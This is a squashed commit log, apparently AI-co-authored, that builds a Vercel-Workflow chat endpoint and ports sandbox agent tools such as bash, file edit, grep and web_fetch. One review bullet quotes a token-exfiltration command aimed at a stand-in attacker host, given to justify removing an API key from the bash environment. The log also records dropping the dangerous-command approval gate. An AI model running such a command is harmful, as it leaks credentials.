Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
…tch (#585) (#586)

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

